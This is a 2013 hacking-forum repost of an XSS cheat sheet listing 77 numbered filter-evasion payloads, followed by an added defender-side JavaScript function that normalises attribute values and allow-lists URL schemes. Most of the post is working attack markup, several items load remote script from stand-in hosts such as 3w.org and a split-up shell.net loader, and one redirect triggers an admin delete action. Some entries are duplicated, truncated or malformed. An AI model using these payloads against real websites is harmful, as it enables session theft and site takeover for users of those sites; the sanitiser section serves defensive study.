XSS Attack Roundup

Posted on 2013-4-19 19:22:37
There doesn't seem to be much XSS material on t00ls, so I'm copying over a good find in case anyone wants to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multiline JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically useless domestically, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
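Added example, not code from the post or from the cheat sheet it reposts: a defender-side check in JavaScript that normalises a src/href/background attribute value the way the lenient parsers behind items 3-19 and 40-47 do (numeric character references with or without semicolons, embedded tabs/newlines/NULs, mixed case, the extra code points listed in item 47) and then accepts only an allow-listed scheme. The function names, the allow-list and the sample values are my own assumptions; named entities such as &colon; are not decoded here, which a real sanitiser would also need to handle.

```javascript
// Added example, not from the post or the cheat sheet it reposts: a defender-
// side check that normalises a src/href/background value the way the lenient
// parsers in items 3-19 and 40-47 do, then accepts only allow-listed schemes.
// Decode numeric character references, with or without the trailing semicolon
// (items 5 and 8-10 rely on the missing semicolon being tolerated).
function decodeCharRefs(s) {
  const toChar = (n) => (n > 0x10ffff ? "\ufffd" : String.fromCodePoint(n));
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => toChar(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => toChar(parseInt(d, 10)));
}

// Characters the browsers of that era ignored before or inside a scheme: C0
// controls incl. NUL/tab/LF/CR (items 11-14, 17-19), DEL, NBSP, U+2000-200B,
// U+2028/2029, U+3000 and the BOM (the code-point list in item 47).
const IGNORABLE = /[\u0000-\u0020\u007f\u00a0\u2000-\u200b\u2028\u2029\u3000\ufeff]/g;

function normalizeUrlAttribute(value) {
  return decodeCharRefs(String(value)).replace(IGNORABLE, "").toLowerCase();
}

// Scheme of a normalised value, or null for relative and protocol-relative
// URLs (items 74-76 are ordinary links and must not be flagged).
function schemeOf(normalized) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalized);
  return m ? m[1] : null;
}

// Allow-list (assumed): javascript: (items 3-47) and vbscript: (item 40) are never in it.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

function isSafeUrlAttribute(value) {
  const scheme = schemeOf(normalizeUrlAttribute(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}
// Constructed samples modelled on the list (hypothetical values, not copied).
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",                                         // item 4
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)", // item 10
  "jav\tascript:alert('XSS')",                                        // item 11
  " java\u0000script:alert('XSS')",                                   // items 17, 19
  "vbscript:msgbox(\"XSS\")",                                         // item 40
  "http://3232235521",                                                // item 70
  "//www.google.com/",                                                // item 74
];
// Values the check rejects; everything else is passed through unchanged.
function rejectedSamples() {
  return SAMPLES.filter((v) => !isSafeUrlAttribute(v));
}
```

Of the seven constructed samples, the five script-scheme variants are rejected while the decimal-IP link and the protocol-relative link pass, so the decision is made on the normalised scheme only and the original value is never rewritten.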